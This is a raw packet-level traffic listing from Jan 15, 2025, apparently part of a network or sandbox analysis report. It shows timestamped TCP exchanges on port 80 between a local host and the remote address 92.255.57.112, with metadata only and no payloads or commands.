Jan 15, 2025 10:09:10.515696049 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515702009 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515714884 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515724897 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515727043 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515738964 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515752077 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515763044 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.515774965 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.515810013 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516242981 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516254902 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516266108 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516277075 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516288042 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516298056 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516299963 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516313076 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516320944 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516333103 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516344070 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516345024 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516356945 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516370058 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516375065 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516383886 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516395092 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516396046 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516407013 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516419888 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516442060 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516443014 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516453981 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516464949 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516475916 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516488075 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.516494036 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.516515970 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520205021 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520219088 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520230055 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520241976 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520255089 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520266056 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520277977 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520287991 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520288944 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520302057 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520313978 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520339012 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520348072 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520359039 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520369053 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520370960 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520381927 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520395041 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520397902 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520407915 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520421028 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520422935 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520432949 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520446062 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.520461082 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520484924 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.520484924 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.583739042 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620589018 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620616913 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620631933 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620644093 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620656013 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620667934 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620683908 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620693922 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620704889 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620718002 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620718956 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620729923 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620763063 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620763063 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620847940 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620860100 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620872021 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620883942 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620897055 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620912075 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620925903 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620949984 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.620980978 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.620994091 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621061087 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621083975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621108055 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621129036 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621200085 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621212006 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621226072 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621237040 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621252060 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621275902 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621294975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621377945 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621388912 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621402025 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621418953 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621449947 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621450901 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621464014 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621476889 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621495962 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621507883 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621516943 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621541977 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621551037 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621573925 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621581078 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621587038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621607065 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621618986 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621632099 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621644974 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621675968 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621860027 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621871948 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621891975 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621901989 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621910095 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621913910 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621927023 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621932030 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621941090 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621948957 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621972084 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621984005 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.621988058 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.621994972 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.622008085 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.622020006 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.622030020 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.622030020 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.622042894 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.622066021 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.622087002 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625715017 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625729084 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625749111 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625758886 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625771046 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625782013 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625792980 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625794888 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625811100 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625819921 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625825882 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625839949 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625849009 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625866890 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625869036 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625880957 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625893116 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625904083 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625906944 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625916958 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625927925 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625938892 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625938892 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625953913 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625955105 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.625966072 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.625983953 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626017094 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626223087 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626280069 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626344919 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626355886 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626384974 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626385927 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626396894 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626410007 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626421928 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626426935 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626441002 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626450062 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626455069 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626468897 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626480103 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626492977 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626517057 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626549959 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626575947 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626588106 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626600981 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626614094 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626621008 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626626968 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626646996 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.626957893 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626970053 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.626991034 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627001047 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627007008 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627013922 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627032995 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627044916 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627053976 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627053976 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627058983 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627073050 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627108097 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627115965 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627125978 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627136946 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627150059 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627161026 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627171993 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627173901 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627193928 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627229929 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627240896 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627254009 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627268076 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627298117 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627367973 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627685070 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627703905 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627717018 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627723932 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627732038 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627746105 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627754927 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627759933 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627780914 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627830982 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627842903 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627855062 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.627882957 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.627907991 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.632761002 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632775068 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632786036 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632801056 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632834911 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.632848024 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632869959 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632879972 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.632880926 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632903099 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632915974 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632922888 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.632927895 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632941008 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632952929 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632966042 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632986069 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632991076 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.632998943 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.632999897 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633006096 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633021116 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633088112 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633100986 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633121014 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633131981 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633143902 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633145094 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633176088 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633177042 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633188963 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633198023 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633203983 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633214951 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633220911 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633230925 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633285046 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633296013 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633331060 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633335114 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633348942 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633358002 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633375883 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633378983 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633392096 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633404016 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633420944 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633420944 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633435965 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633450985 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633455038 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633469105 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633480072 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633481979 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633496046 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633517981 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633533001 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633543015 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633547068 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633558989 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633589983 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633601904 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633609056 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633613110 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633625984 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633630037 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633652925 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633666992 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633758068 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633775949 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633783102 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633788109 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633799076 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633810043 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633819103 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633821964 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633836031 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633845091 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633862972 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633888006 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633899927 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633909941 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633929968 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633946896 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.633958101 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633970022 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633980989 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.633994102 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634001017 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634015083 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634025097 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634033918 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634046078 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634057045 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634071112 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634078979 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634083033 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634102106 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634119987 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.634166956 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634186983 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634198904 CET	80	49708	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.634232998 CET	49708	80	192.168.2.5	92.255.57.112
